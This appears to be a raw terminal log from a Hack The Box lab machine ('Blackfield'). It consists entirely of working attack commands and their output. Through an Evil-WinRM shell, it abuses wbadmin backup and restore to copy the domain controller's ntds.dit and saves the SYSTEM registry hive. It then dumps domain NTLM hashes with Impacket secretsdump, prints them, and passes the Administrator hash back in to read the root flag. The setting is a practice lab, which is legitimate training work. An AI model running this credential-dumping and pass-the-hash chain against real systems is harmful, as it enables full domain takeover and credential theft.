*Evil-WinRM* PS C:\temp> wbadmin start backup -backuptarget:\\10.10.10.192\C$\Windows\temp -include:c:\windows\ntds\Ntds.dit -quiet


This might take several minutes.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Windows Server Backup is updating the existing backup to remove files that have
been deleted from your server since the last backup.
This might take a few minutes.
The backup of volume (C:) completed successfully.
Summary of the backup operation:
------------------

The backup operation successfully completed.
The backup of volume (C:) completed successfully.
Log of files successfully backed up:
C:\Windows\Logs\WindowsServerBackup\Backup-18-02-2021_16-42-21.log

*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp> wbadmin GET VERSIONS
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.

Backup time: 9/21/2020 3:00 PM
Backup location: Network Share labeled \\10.10.14.4\blackfieldA
Version identifier: 09/21/2020-23:00
Can recover: Volume(s), File(s)

Backup time: 2/18/2021 8:42 AM
Backup location: Network Share labeled \\10.10.10.192\C$\Windows\temp
Version identifier: 02/18/2021-16:42
Can recover: Volume(s), File(s)

*Evil-WinRM* PS C:\temp> wbadmin start recovery -version:02/18/2021-16:42 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:c:\users\svc_backup\Documents -notrestoreacl -quietwbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.

Retrieving volume information...
You have chosen to recover the file(s) c:\windows\ntds\ntds.dit from the
backup created on 2/18/2021 8:42 AM to c:\users\svc_backup\Documents.
Preparing to recover files...

Successfully recovered c:\windows\ntds\ntds.dit to c:\users\svc_backup\Documents\.
The recovery operation completed.
Summary of the recovery operation:
--------------------

Recovery of c:\windows\ntds\ntds.dit to c:\users\svc_backup\Documents\ successfully completed.
Total bytes recovered: 18.00 MB
Total files recovered: 1
Total files failed: 0

Log of files successfully recovered:
C:\Windows\Logs\WindowsServerBackup\FileRestore-18-02-2021_16-47-40.log

*Evil-WinRM* PS C:\temp> 


*Evil-WinRM* PS C:\users\svc_backup\Documents> reg.exe save hklm\system c:\Users\svc_backup\Documents\SYSTEM
The operation completed successfully.

*Evil-WinRM* PS C:\users\svc_backup\Documents> dir


    Directory: C:\users\svc_backup\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/18/2021   8:42 AM       18874368 ntds.dit
-a----        2/18/2021   8:57 AM       17395712 SYSTEM


*Evil-WinRM* PS C:\users\svc_backup\Documents> 


┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $cat NTLM.txt 
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

┌─[npe@cav3]─[/usr/share/doc/python3-impacket/examples]
└──╼ $sudo python3 secretsdump.py -ntds /home/npe/Documents/HTB/lab/blackfield/ntds.dit -system /home/npe/Documents/HTB/lab/blackfield/SYSTEM LOCAL > /home/npe/Documents/HTB/lab/blackfield/NTLM.txt

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from /home/npe/Documents/HTB/lab/blackfield/ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:00c0e41ca28fe109d01e3f8cdf97e0bf:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:6257ae42cc3346f60113174155d7bbd9:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::


┌─[npe@cav3]─[~/Documents/HTB/lab/blackfield]
└──╼ $evil-winrm -u Administrator -H '184fb5e5178480be64824d4cd53b99ee' -i 10.10.10.192

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
7392dae0e9803d93d0ddf2e11895c820
*Evil-WinRM* PS C:\Users\Administrator\Desktop> 

